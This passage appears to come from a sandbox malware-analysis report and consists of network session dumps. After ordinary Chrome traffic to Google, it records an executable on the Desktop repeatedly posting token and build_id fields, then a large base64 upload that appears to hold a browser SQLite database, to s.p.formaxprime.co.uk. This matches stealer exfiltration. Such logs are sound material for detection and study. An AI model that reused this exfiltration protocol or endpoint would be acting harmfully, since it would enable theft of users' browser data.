                                                                                            2025-03-13 13:50:11 UTC477INData Raw: 64 5c 75 30 30 33 64 4c 64 28 29 29 3b 72 65 74 75 72 6e 20 4d 64 7d 3b 5c 6e 5f 2e 50 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 4e 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4f 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 51 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4f 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b 7d 3b 5f 2e 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 52 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69
                                                                                            Data Ascii: d\u003dLd());return Md};\n_.Pd\u003dfunction(a){const b\u003d_.Nd();return new _.Od(b?b.createScriptURL(a):a)};_.Qd\u003dfunction(a){if(a instanceof _.Od)return a.i;throw Error(\"H\");};_.Sd\u003dfunction(a){if(Rd.test(a))return a};_.Td\u003dfunction(a){i
                                                                                            2025-03-13 13:50:11 UTC478INData Raw: 31 64 37 0d 0a 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 64 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 64 2e 6e 6f 6e 63 65 7c 7c 64 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5f 2e 56 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 61 2c 62 2c 63 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5c 6e 5f 2e 57 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 49 64 28 5f 2e 42 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 48 64 28 5f 2e 42 63 28 61 2c 62 29 29 7d 3b 5f
                                                                                            Data Ascii: 1d7`${a}[nonce]`);return d\u003d\u003dnull?\"\":d.nonce||d.getAttribute(\"nonce\")||\"\"};_.Vd\u003dfunction(a,b,c){return _.tb(a,b,c)!\u003d\u003dvoid 0};\n_.Wd\u003dfunction(a,b){return _.Id(_.Bc(a,b))};_.S\u003dfunction(a,b){return _.Hd(_.Bc(a,b))};_
                                                                                            2025-03-13 13:50:11 UTC1378INData Raw: 38 30 30 30 0d 0a 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 4b 64 5c 75 30 30 33 64 5f 2e 42 64 3b 5f 2e 4f 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 52 64 5c 75 30 30 33 64 2f 5e 5c 5c 73 2a 28 3f 21 6a 61 76 61 73 63 72 69 70 74 3a 29 28 3f 3a 5b 5c 5c 77 2b 2e 2d 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 64 65 2c 68 65 2c 24
                                                                                            Data Ascii: 8000rray\"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};Kd\u003d_.Bd;_.Od\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};Rd\u003d/^\\s*(?!javascript:)(?:[\\w+.-]+:|[^:/?#]*(?:[/?#]|$))/i;var de,he,$


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            14192.168.2.449749216.58.206.364435228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:11 UTC393OUTGET /async/newtab_promos HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            Sec-Fetch-Site: cross-site
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            Sec-Fetch-Storage-Access: active
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br, zstd
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            2025-03-13 13:50:11 UTC970INHTTP/1.1 200 OK
                                                                                            Version: 734020781
                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                            Accept-CH: Downlink
                                                                                            Accept-CH: RTT
                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                            Permissions-Policy: unload=()
                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                            Date: Thu, 13 Mar 2025 13:50:11 GMT
                                                                                            Server: gws
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Accept-Ranges: none
                                                                                            Vary: Accept-Encoding
                                                                                            Connection: close
                                                                                            Transfer-Encoding: chunked
                                                                                            2025-03-13 13:50:11 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                            Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                            2025-03-13 13:50:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            15192.168.2.44976078.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:15 UTC271OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----cbsjw4oz5fcjm7gvaaaa
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 505
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:15 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 61 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------cbsjw4oz5fcjm7gvaaaaContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------cbsjw4oz5fcjm7gvaaaaContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------cbsjw4oz5fcjm7gvaaaaCont
                                                                                            2025-03-13 13:50:16 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 2ok0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            16192.168.2.44976378.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:17 UTC271OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----sr90rq1dtjw47yukxbi5
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 493
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:17 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 73 72 39 30 72 71 31 64 74 6a 77 34 37 79 75 6b 78 62 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 73 72 39 30 72 71 31 64 74 6a 77 34 37 79 75 6b 78 62 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 73 72 39 30 72 71 31 64 74 6a 77 34 37 79 75 6b 78 62 69 35 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------sr90rq1dtjw47yukxbi5Content-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------sr90rq1dtjw47yukxbi5Content-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------sr90rq1dtjw47yukxbi5Cont
                                                                                            2025-03-13 13:50:18 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 2ok0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            17192.168.2.44976478.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:19 UTC274OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----9rqqimg479h4e3e3wtr1
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 169765
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:19 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 39 72 71 71 69 6d 67 34 37 39 68 34 65 33 65 33 77 74 72 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 39 72 71 71 69 6d 67 34 37 39 68 34 65 33 65 33 77 74 72 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 39 72 71 71 69 6d 67 34 37 39 68 34 65 33 65 33 77 74 72 31 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------9rqqimg479h4e3e3wtr1Content-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------9rqqimg479h4e3e3wtr1Content-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------9rqqimg479h4e3e3wtr1Cont
                                                                                            2025-03-13 13:50:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:19 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                            Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                            2025-03-13 13:50:20 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:20 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
